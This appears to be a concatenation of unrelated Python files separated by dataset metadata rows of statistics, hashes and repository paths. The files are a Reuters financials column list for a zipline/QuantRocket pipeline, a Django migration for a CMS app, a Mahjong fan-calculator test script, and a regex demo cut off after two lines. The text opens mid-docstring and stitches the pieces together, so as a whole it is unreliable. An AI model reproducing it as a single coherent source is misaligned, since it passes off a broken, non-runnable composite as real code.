Other Bearing Liabilities, Total: SOBL
Other Current Assets, Total: SOCA
Other Current liabilities, Total: SOCL
Other Earning Assets, Total: SOEA
Other Equity, Total: SOTE
Other Investing Cash Flow Items, Total: SICF
Other Liabilities, Total: SLTL
Other Long Term Assets, Total: SOLA
Other Operating Expenses, Total: SOOE
Other Revenue, Total: SORE
Other, Net: SONT
Payable/Accrued: LPBA
Policy Liabilities: SPOL
Preferred Stock - Non Redeemable, Net: SPRS
Prepaid Expenses: APPY
Property/Plant/Equipment, Total - Gross: APTC
Property/Plant/Equipment, Total - Net: APPN
Provision for Income Taxes: TTAX
Realized & Unrealized Gains (Losses): RRGL
Redeemable Preferred Stock, Total: SRPR
Research & Development: ERAD
Retained Earnings (Accumulated Deficit): QRED
Revenue: SREV
Selling/General/Admin. Expenses, Total: SSGA
Short Term Investments: ASTI
Tangible Book Value per Share, Common Eq: STBP
Total Adjustments to Net Income: SANI
Total Assets: ATOT
Total Cash Dividends Paid: FCDP
Total Common Shares Outstanding: QTCO
Total Current Assets: ATCA
Total Current Liabilities: LTCL
Total Debt: STLD
Total Deposits: LDBT
Total Equity: QTLE
Total Extraordinary Items: STXI
Total Interest Expense: STIE
Total Inventory: AITL
Total Liabilities: LTLL
Total Liabilities & Shareholders' Equity: QTEL
Total Long Term Debt: LTTD
Total Operating Expense: ETOE
Total Preferred Shares Outstanding: QTPO
Total Premiums Earned: SPRE
Total Receivables, Net: ATRC
Total Revenue: RTLR
Total Short Term Borrowings: LSTB
Total Utility Plant, Net: SUPN
Treasury Stock - Common: QTSC
U.S. GAAP Adjustment: CGAP
Unrealized Gain (Loss): QUGL
Unusual Expense (Income): SUIE
To regenerate the column list and docstring:
>>> from quantrocket.fundamental import list_reuters_codes
>>> codes = list_reuters_codes(report_types=["financials"])
>>> attrs= "\n".join(["{0} = Column(float64_dtype) # {1}".format(k,v) for k,v in codes["financials"].items()])
>>> print(attrs)
>>> docstring = "\n".join(["{0}: {1}".format(v,k) for k,v in sorted(codes["financials"].items(), key=lambda x: x[1])])
>>> print(docstring)
"""
SCMS = Column(float64_dtype) # Common Stock, Total
VDES = Column(float64_dtype) # Diluted Normalized EPS
SDNI = Column(float64_dtype) # Diluted Net Income
SPRS = Column(float64_dtype) # Preferred Stock - Non Redeemable, Net
SOPI = Column(float64_dtype) # Operating Income
LAPB = Column(float64_dtype) # Accounts Payable
NINC = Column(float64_dtype) # Net Income
SOCL = Column(float64_dtype) # Other Current liabilities, Total
ETOE = Column(float64_dtype) # Total Operating Expense
SOLA = Column(float64_dtype) # Other Long Term Assets, Total
SREV = Column(float64_dtype) # Revenue
LAEX = Column(float64_dtype) # Accrued Expenses
XNIC = Column(float64_dtype) # Income Available to Com Incl ExtraOrd
SUIE = Column(float64_dtype) # Unusual Expense (Income)
APTC = Column(float64_dtype) # Property/Plant/Equipment, Total - Gross
SOBL = Column(float64_dtype) # Other Bearing Liabilities, Total
SNII = Column(float64_dtype) # Non-Interest Income, Bank
CEIA = Column(float64_dtype) # Equity In Affiliates
ERAD = Column(float64_dtype) # Research & Development
SDBF = Column(float64_dtype) # Diluted EPS Excluding ExtraOrd Items
SDWS = Column(float64_dtype) # Diluted Weighted Average Shares
SORE = Column(float64_dtype) # Other Revenue, Total
SCEX = Column(float64_dtype) # Capital Expenditures
ELLP = Column(float64_dtype) # Loan Loss Provision
ACSH = Column(float64_dtype) # Cash
AACR = Column(float64_dtype) # Accounts Receivable - Trade, Net
SCOR = Column(float64_dtype) # Cost of Revenue, Total
SUPN = Column(float64_dtype) # Total Utility Plant, Net
EIBT = Column(float64_dtype) # Net Income Before Taxes
AGWI = Column(float64_dtype) # Goodwill, Net
SCIP = Column(float64_dtype) # Cash Interest Paid
SDED = Column(float64_dtype) # Depreciation/Depletion
RNII = Column(float64_dtype) # Net Investment Income
ADPA = Column(float64_dtype) # Deferred Policy Acquisition Costs
SONT = Column(float64_dtype) # Other, Net
CGAP = Column(float64_dtype) # U.S. GAAP Adjustment
AINT = Column(float64_dtype) # Intangibles, Net
SGRP = Column(float64_dtype) # Gross Profit
SNIE = Column(float64_dtype) # Non-Interest Expense, Bank
EDOE = Column(float64_dtype) # Operations & Maintenance
SSGA = Column(float64_dtype) # Selling/General/Admin. Expenses, Total
SNIN = Column(float64_dtype) # Interest Inc.(Exp.),Net-Non-Op., Total
QTSC = Column(float64_dtype) # Treasury Stock - Common
OCPD = Column(float64_dtype) # Cash Payments
OBDT = Column(float64_dtype) # Deferred Taxes
TTAX = Column(float64_dtype) # Provision for Income Taxes
LPBA = Column(float64_dtype) # Payable/Accrued
QRED = Column(float64_dtype) # Retained Earnings (Accumulated Deficit)
SCSI = Column(float64_dtype) # Cash and Short Term Investments
SIAP = Column(float64_dtype) # Net Interest Inc. After Loan Loss Prov.
ANTL = Column(float64_dtype) # Net Loans
QTCO = Column(float64_dtype) # Total Common Shares Outstanding
LDBT = Column(float64_dtype) # Total Deposits
SANI = Column(float64_dtype) # Total Adjustments to Net Income
AITL = Column(float64_dtype) # Total Inventory
ATRC = Column(float64_dtype) # Total Receivables, Net
SBDT = Column(float64_dtype) # Deferred Income Tax
ASTI = Column(float64_dtype) # Short Term Investments
OTLO = Column(float64_dtype) # Cash from Operating Activities
OCRC = Column(float64_dtype) # Cash Receipts
RRGL = Column(float64_dtype) # Realized & Unrealized Gains (Losses)
STLD = Column(float64_dtype) # Total Debt
LTTD = Column(float64_dtype) # Total Long Term Debt
LTLL = Column(float64_dtype) # Total Liabilities
APPN = Column(float64_dtype) # Property/Plant/Equipment, Total - Net
SCTP = Column(float64_dtype) # Cash Taxes Paid
SLTL = Column(float64_dtype) # Other Liabilities, Total
DDPS1 = Column(float64_dtype) # DPS - Common Stock Primary Issue
SRPR = Column(float64_dtype) # Redeemable Preferred Stock, Total
ITLI = Column(float64_dtype) # Cash from Investing Activities
ONET = Column(float64_dtype) # Net Income/Starting Line
SDPR = Column(float64_dtype) # Depreciation/Amortization
STIE = Column(float64_dtype) # Total Interest Expense
APRE = Column(float64_dtype) # Insurance Receivables
SNCC = Column(float64_dtype) # Net Change in Cash
SFCF = Column(float64_dtype) # Financing Cash Flow Items
SINN = Column(float64_dtype) # Interest Exp.(Inc.),Net-Operating, Total
CMIN = Column(float64_dtype) # Minority Interest
SOAT = Column(float64_dtype) # Other Assets, Total
SNCI = Column(float64_dtype) # Non-Cash Items
LCLD = Column(float64_dtype) # Current Port. of LT Debt/Capital Leases
SDAJ = Column(float64_dtype) # Dilution Adjustment
SIIB = Column(float64_dtype) # Interest Income, Bank
QUGL = Column(float64_dtype) # Unrealized Gain (Loss)
NIBX = Column(float64_dtype) # Net Income Before Extra. Items
SOOE = Column(float64_dtype) # Other Operating Expenses, Total
SAMT = Column(float64_dtype) # Amortization
SFEE = Column(float64_dtype) # Foreign Exchange Effects
STXI = Column(float64_dtype) # Total Extraordinary Items
APPY = Column(float64_dtype) # Prepaid Expenses
EFEX = Column(float64_dtype) # Fuel Expense
QTPO = Column(float64_dtype) # Total Preferred Shares Outstanding
NGLA = Column(float64_dtype) # Gain (Loss) on Sale of Assets
SINV = Column(float64_dtype) # Long Term Investments
SOCA = Column(float64_dtype) # Other Current Assets, Total
FCDP = Column(float64_dtype) # Total Cash Dividends Paid
FPSS = Column(float64_dtype) # Issuance (Retirement) of Stock, Net
RTLR = Column(float64_dtype) # Total Revenue
ACDB = Column(float64_dtype) # Cash & Due from Banks
TIAT = Column(float64_dtype) # Net Income After Taxes
SOEA = Column(float64_dtype) # Other Earning Assets, Total
SOTE = Column(float64_dtype) # Other Equity, Total
SPOL = Column(float64_dtype) # Policy Liabilities
NAFC = Column(float64_dtype) # Allowance for Funds Used During Const.
QPIC = Column(float64_dtype) # Additional Paid-In Capital
QTLE = Column(float64_dtype) # Total Equity
ACAE = Column(float64_dtype) # Cash & Equivalents
FPRD = Column(float64_dtype) # Issuance (Retirement) of Debt, Net
ALTR = Column(float64_dtype) # Note Receivable - Long Term
SLBA = Column(float64_dtype) # Losses, Benefits, and Adjustments, Total
ATCA = Column(float64_dtype) # Total Current Assets
SOCF = Column(float64_dtype) # Changes in Working Capital
LCLO = Column(float64_dtype) # Capital Lease Obligations
LSTD = Column(float64_dtype) # Notes Payable/Short Term Debt
STBP = Column(float64_dtype) # Tangible Book Value per Share, Common Eq
SICF = Column(float64_dtype) # Other Investing Cash Flow Items, Total
ENII = Column(float64_dtype) # Net Interest Income
QTEL = Column(float64_dtype) # Total Liabilities & Shareholders' Equity
FTLF = Column(float64_dtype) # Cash from Financing Activities
LTCL = Column(float64_dtype) # Total Current Liabilities
SPRE = Column(float64_dtype) # Total Premiums Earned
LSTB = Column(float64_dtype) # Total Short Term Borrowings
EPAC = Column(float64_dtype) # Amortization of Policy Acquisition Costs
LLTD = Column(float64_dtype) # Long Term Debt
ATOT = Column(float64_dtype) # Total Assets
CIAC = Column(float64_dtype) # Income Available to Com Excl ExtraOrd
QEDG = Column(float64_dtype) # ESOP Debt Guarantee
LMIN = Column(float64_dtype) # Minority Interest
ADEP = Column(float64_dtype) # Accumulated Depreciation, Total
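
# Editorial sketch (assumption-labeled, not in the original module): the
# annual and interim variants can sit side by side in one Pipeline, e.g. to
# compare the latest interim revenue against the last annual figure. SREV is
# an arbitrary column choice for illustration.
def example_interim_vs_annual_revenue():
    """Pipeline with annual and interim revenue columns (illustrative)."""
    from zipline.pipeline import Pipeline  # deferred import: example only

    return Pipeline(
        columns={
            "annual_revenue": ReutersFinancials.SREV.latest,
            "interim_revenue": ReutersInterimFinancials.SREV.latest,
        },
    )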
| 46.532399 | 122 | 0.720888 | 3,354 | 26,570 | 5.629696 | 0.119559 | 0.165872 | 0.247855 | 0.053596 | 0.967694 | 0.967694 | 0.967694 | 0.967694 | 0.967694 | 0.967694 | 0 | 0.025759 | 0.205156 | 26,570 | 570 | 123 | 46.614035 | 0.868318 | 0.65111 | 0 | 0.984733 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007634 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
1738d495ef8f65c7515c69d843c3df87f0d62b99 | 21,768 | py | Python | stack_it/migrations/0001_initial.py | Jufik/django_stack_it | d95e960ad7ee7f62d5370fb36d0a8dc863a0edd6 | [
"MIT"
] | 8 | 2019-04-15T13:14:19.000Z | 2022-03-09T17:35:11.000Z | stack_it/migrations/0001_initial.py | Jufik/django_stack_it | d95e960ad7ee7f62d5370fb36d0a8dc863a0edd6 | [
"MIT"
] | 3 | 2019-03-19T13:53:52.000Z | 2020-02-11T23:54:45.000Z | stack_it/migrations/0001_initial.py | Jufik/django_stack_it | d95e960ad7ee7f62d5370fb36d0a8dc863a0edd6 | [
"MIT"
] | 3 | 2019-06-05T12:52:26.000Z | 2019-07-24T08:14:49.000Z | # Generated by Django 2.1.5 on 2019-09-03 07:00
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
import mptt.fields
import polymorphic_tree.models
import stack_it.utils.validators


class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('folder', models.CharField(choices=[('folder', 'folder')], default='folder', max_length=50, verbose_name='Folder')),
('image', models.ImageField(upload_to='', verbose_name='Image')),
('alt', models.CharField(blank=True, max_length=50, verbose_name='Alternative text')),
],
options={
'verbose_name': 'Image',
'verbose_name_plural': 'Images',
},
),
migrations.CreateModel(
name='Menu',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=150, verbose_name='Name')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
],
options={
'verbose_name': 'Menu',
'verbose_name_plural': 'Menus',
},
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('meta_description', models.CharField(default='', help_text='keep this under 160 characters for best optimisation', max_length=250, verbose_name='Meta Description')),
('meta_description_en', models.CharField(default='', help_text='keep this under 160 characters for best optimisation', max_length=250, null=True, verbose_name='Meta Description')),
('meta_description_fr', models.CharField(default='', help_text='keep this under 160 characters for best optimisation', max_length=250, null=True, verbose_name='Meta Description')),
('meta_title', models.TextField(default='', help_text='keep this under 60 characters for best optimisation', verbose_name='Meta Title')),
('meta_title_en', models.TextField(default='', help_text='keep this under 60 characters for best optimisation', null=True, verbose_name='Meta Title')),
('meta_title_fr', models.TextField(default='', help_text='keep this under 60 characters for best optimisation', null=True, verbose_name='Meta Title')),
('tw_title', models.CharField(blank=True, help_text='Keep this under 70 characters for best optimisation', max_length=100, verbose_name='Twitter Title')),
('tw_title_en', models.CharField(blank=True, help_text='Keep this under 70 characters for best optimisation', max_length=100, null=True, verbose_name='Twitter Title')),
('tw_title_fr', models.CharField(blank=True, help_text='Keep this under 70 characters for best optimisation', max_length=100, null=True, verbose_name='Twitter Title')),
('tw_description', models.TextField(blank=True, help_text='Twitter description less than 200 characters', verbose_name='Twitter Description')),
('tw_description_en', models.TextField(blank=True, help_text='Twitter description less than 200 characters', null=True, verbose_name='Twitter Description')),
('tw_description_fr', models.TextField(blank=True, help_text='Twitter description less than 200 characters', null=True, verbose_name='Twitter Description')),
('og_title', models.CharField(blank=True, help_text='Keep it under 55 characters for best optimisation', max_length=100, verbose_name='Facebook Title')),
('og_title_en', models.CharField(blank=True, help_text='Keep it under 55 characters for best optimisation', max_length=100, null=True, verbose_name='Facebook Title')),
('og_title_fr', models.CharField(blank=True, help_text='Keep it under 55 characters for best optimisation', max_length=100, null=True, verbose_name='Facebook Title')),
('og_description', models.TextField(blank=True, help_text='Facebook description less than 300 characters', verbose_name='Facebook Description')),
('og_description_en', models.TextField(blank=True, help_text='Facebook description less than 300 characters', null=True, verbose_name='Facebook Description')),
('og_description_fr', models.TextField(blank=True, help_text='Facebook description less than 300 characters', null=True, verbose_name='Facebook Description')),
('priority', models.FloatField(default=0.5, verbose_name='Page priority for indexation')),
('changefreq', models.CharField(choices=[('always', 'always'), ('hourly', 'hourly'), ('daily', 'daily'), ('weekly', 'weekly'), ('monthly', 'monthly'), ('yearly', 'yearly'), ('never', 'never')], default='monthly', max_length=50, verbose_name='Page change frequency')),
('slug', models.SlugField(blank=True, max_length=500, verbose_name='Slug')),
('slug_en', models.SlugField(blank=True, max_length=500, null=True, verbose_name='Slug')),
('slug_fr', models.SlugField(blank=True, max_length=500, null=True, verbose_name='Slug')),
                ('auto_slug', models.BooleanField(default=True, help_text="When set, your slug will automatically be updated from the field defined in the class's SLUGIFY_FROM", verbose_name='Auto Slug')),
                ('auto_slug_en', models.BooleanField(default=True, help_text="When set, your slug will automatically be updated from the field defined in the class's SLUGIFY_FROM", verbose_name='Auto Slug')),
                ('auto_slug_fr', models.BooleanField(default=True, help_text="When set, your slug will automatically be updated from the field defined in the class's SLUGIFY_FROM", verbose_name='Auto Slug')),
('ref_full_path', models.SlugField(editable=False, max_length=500, verbose_name='Denormalized full path')),
('ref_full_path_en', models.SlugField(editable=False, max_length=500, null=True, verbose_name='Denormalized full path')),
('ref_full_path_fr', models.SlugField(editable=False, max_length=500, null=True, verbose_name='Denormalized full path')),
('template_path', models.CharField(default='', max_length=250, verbose_name='Template Path')),
('title', models.CharField(max_length=250, verbose_name='Title')),
('title_en', models.CharField(max_length=250, null=True, verbose_name='Title')),
('title_fr', models.CharField(max_length=250, null=True, verbose_name='Title')),
('status', model_utils.fields.StatusField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=100, no_check_for_status=True)),
('verbose_name', models.CharField(max_length=250, verbose_name='Instance model verbose_name')),
('key', models.SlugField(blank=True, max_length=250, null=True, verbose_name='Key for development')),
('date_updated', models.DateTimeField(auto_now=True, verbose_name='Last update date')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('main_site', models.ForeignKey(blank=True, help_text='In case the page is available on multiple websites, choose which one is to be considered as the main one', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pages_as_main_site', to='sites.Site', verbose_name='Main Site')),
('meta_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='meta_images', to='stack_it.Image', verbose_name='Meta Image')),
                ('og_image', models.ForeignKey(blank=True, help_text='must be at least 1200x630px', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='og_images', to='stack_it.Image', verbose_name='Facebook Image')),
('parent', polymorphic_tree.models.PolymorphicTreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='stack_it.Page')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_stack_it.page_set+', to='contenttypes.ContentType')),
('sites', models.ManyToManyField(help_text='This page will be available for each of those websites', to='sites.Site', verbose_name='Site')),
('tw_image', models.ForeignKey(blank=True, help_text='must be at least 120x120px', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='tw_images', to='stack_it.Image', verbose_name='Twitter Image')),
],
options={
'verbose_name': 'Page',
'verbose_name_plural': 'Pages',
},
),
migrations.CreateModel(
name='PageContent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('key', models.CharField(max_length=50, verbose_name='Key')),
('content_type', models.CharField(choices=[('meta', 'Meta content'), ('value', 'Standard content')], default='value', max_length=50, verbose_name='Content Type')),
],
options={
'verbose_name': 'Page Content',
'verbose_name_plural': 'Page Contents',
},
),
migrations.CreateModel(
name='Template',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=250, null=True, verbose_name='Name')),
('path', models.CharField(max_length=250, verbose_name='Path')),
],
options={
'verbose_name': 'Template',
'verbose_name_plural': 'Templates',
},
),
migrations.CreateModel(
name='TemplateContent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('key', models.CharField(max_length=50, verbose_name='Key')),
('content_type', models.CharField(choices=[('meta', 'Meta content'), ('value', 'Standard content')], default='value', max_length=50, verbose_name='Content Type')),
],
options={
                'verbose_name': 'Template Content',
                'verbose_name_plural': 'Template Contents',
},
),
migrations.CreateModel(
name='ImagePageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('ref_image', models.ImageField(upload_to='', verbose_name='Image')),
('ref_alt', models.CharField(blank=True, max_length=50, null=True, verbose_name='Alternative text')),
('size', models.CharField(default='800x600', max_length=50, validators=[stack_it.utils.validators.validate_image_size], verbose_name='Size')),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stack_it.Image', verbose_name='Image instance')),
],
options={
'verbose_name': 'Image Page Content',
'verbose_name_plural': 'Image Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='ImageTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('ref_image', models.ImageField(upload_to='', verbose_name='Image')),
('ref_alt', models.CharField(blank=True, max_length=50, null=True, verbose_name='Alternative text')),
('size', models.CharField(default='800x600', max_length=50, validators=[stack_it.utils.validators.validate_image_size], verbose_name='Size')),
('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stack_it.Image', verbose_name='Image instance')),
],
options={
'verbose_name': 'Image Template Content',
'verbose_name_plural': 'Image Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.CreateModel(
name='ModelPageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('instance_id', models.IntegerField(null=True, verbose_name='Object id')),
('model_name', models.CharField(max_length=50, validators=[stack_it.utils.validators.validate_model_name], verbose_name='Model Name')),
],
options={
'verbose_name': 'Related Model Page Content',
'verbose_name_plural': 'Related Model Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='ModelTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('instance_id', models.IntegerField(null=True, verbose_name='Object id')),
('model_name', models.CharField(max_length=50, validators=[stack_it.utils.validators.validate_model_name], verbose_name='Model Name')),
],
options={
'verbose_name': 'Related Model Template Content',
'verbose_name_plural': 'Related Model Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.CreateModel(
name='PagePageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('value', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_pagepagecontent', to='stack_it.Page', verbose_name='Page')),
],
options={
'verbose_name': 'Related Page Page Content',
'verbose_name_plural': 'Related Page Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='PageTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('value', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_pagetemplatecontent', to='stack_it.Page', verbose_name='Page')),
],
options={
'verbose_name': 'Related Page Template Content',
'verbose_name_plural': 'Related Page Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.CreateModel(
name='TextPageContent',
fields=[
('pagecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.PageContent')),
('value', models.TextField(verbose_name='Value')),
('value_en', models.TextField(null=True, verbose_name='Value')),
('value_fr', models.TextField(null=True, verbose_name='Value')),
],
options={
'verbose_name': 'Text Page Content',
'verbose_name_plural': 'Text Page Contents',
},
bases=('stack_it.pagecontent', models.Model),
),
migrations.CreateModel(
name='TextTemplateContent',
fields=[
('templatecontent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='stack_it.TemplateContent')),
('value', models.TextField(verbose_name='Value')),
('value_en', models.TextField(null=True, verbose_name='Value')),
('value_fr', models.TextField(null=True, verbose_name='Value')),
],
options={
'verbose_name': 'Text Template Content',
'verbose_name_plural': 'Text Template Contents',
},
bases=('stack_it.templatecontent', models.Model),
),
migrations.AddField(
model_name='templatecontent',
name='polymorphic_ctype',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_stack_it.templatecontent_set+', to='contenttypes.ContentType'),
),
migrations.AddField(
model_name='templatecontent',
name='template',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='stack_it.Template', verbose_name='Template'),
),
migrations.AddField(
model_name='pagecontent',
name='page',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='stack_it.Page', verbose_name='Page'),
),
migrations.AddField(
model_name='pagecontent',
name='polymorphic_ctype',
field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_stack_it.pagecontent_set+', to='contenttypes.ContentType'),
),
migrations.AddField(
model_name='menu',
name='page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='menus', to='stack_it.Page', verbose_name='Page'),
),
migrations.AddField(
model_name='menu',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='stack_it.Menu'),
),
migrations.AlterUniqueTogether(
name='templatecontent',
unique_together={('template', 'key')},
),
migrations.AlterUniqueTogether(
name='pagecontent',
unique_together={('page', 'key')},
),
]
| 72.318937 | 313 | 0.643284 | 2,370 | 21,768 | 5.715612 | 0.093671 | 0.097446 | 0.03322 | 0.039274 | 0.834933 | 0.809169 | 0.769674 | 0.742138 | 0.719401 | 0.705079 | 0 | 0.011556 | 0.220829 | 21,768 | 300 | 314 | 72.56 | 0.7871 | 0.002067 | 0 | 0.546075 | 1 | 0.003413 | 0.258644 | 0.021868 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023891 | 0 | 0.037543 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
17a24778774c51e482c17606534fe3e0a0837e29 | 880 | py | Python | fan-calculator-usage/Mahjong-GB-Python/test.py | fichas/mahjong | 6d44cc88c62d4a2084af520c8abb60451c548515 | [
"CC0-1.0"
] | null | null | null | fan-calculator-usage/Mahjong-GB-Python/test.py | fichas/mahjong | 6d44cc88c62d4a2084af520c8abb60451c548515 | [
"CC0-1.0"
] | null | null | null | fan-calculator-usage/Mahjong-GB-Python/test.py | fichas/mahjong | 6d44cc88c62d4a2084af520c8abb60451c548515 | [
"CC0-1.0"
] | null | null | null | from MahjongGB import MahjongFanCalculator
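# Smoke tests for the Chinese-standard mahjong fan calculator: two valid
# winning hands first, then two cases that should raise (see comments below).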
try:
ans=MahjongFanCalculator((),("W1","W1","W1","W2","W2","W2","W3","W3","W3","W4","W4","W4","W5"),"W5",1,True,False,False,True,0,0)
except Exception as err:
print(err)
else:
print(ans)
try:
ans=MahjongFanCalculator((("GANG","W1",2),),("W2","W2","W2","W3","W3","W3","W4","W4","W4","W5"),"W5",1,False,False,False,False,0,0)
except Exception as err:
print(err)
else:
print(ans)
# Error case: the concealed hand is one tile short, so the calculator raises
try:
ans=MahjongFanCalculator((),("W1","W1","W1","W2","W2","W2","W3","W3","W3","W4","W4","W4"),"W5",1,True,False,False,True,0,0)
except Exception as err:
print(err)
else:
print(ans)
# Not a winning hand: the W7 win tile completes nothing, so an error is raised
try:
ans=MahjongFanCalculator((("CHI","W1",0),),("W2","W2","W2","W3","W3","W3","W4","W4","W4","W5"),"W7",1,False,False,False,False,0,0)
except Exception as err:
print(err)
else:
    print(ans)
 | 28.387097 | 136 | 0.575 | 137 | 880 | 3.693431 | 0.19708 | 0.063241 | 0.205534 | 0.063241 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0 | 0.085865 | 0.139773 | 880 | 31 | 137 | 28.387097 | 0.582563 | 0.004545 | 0 | 0.8 | 0 | 0 | 0.128994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.32 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bd7f8b1f86e114488d351db50c4ef110867a0407 | 344 | py | Python | AutomateWithPython/chapter07/RegexDemo02.py | YanhaoXu/python-learning | 856687a71635a2ca67dab49d396c238f128e5ec0 | [
"MIT"
] | 2 | 2021-12-06T13:29:48.000Z | 2022-01-20T11:39:45.000Z | AutomateWithPython/chapter07/RegexDemo02.py | YanhaoXu/python-learning | 856687a71635a2ca67dab49d396c238f128e5ec0 | [
"MIT"
] | null | null | null | AutomateWithPython/chapter07/RegexDemo02.py | YanhaoXu/python-learning | 856687a71635a2ca67dab49d396c238f128e5ec0 | [
"MIT"
] | null | null | null | import re
batRegex = re.compile(r"Bat(wo)*man")
mo1 = batRegex.search("The Adventures of Batman")
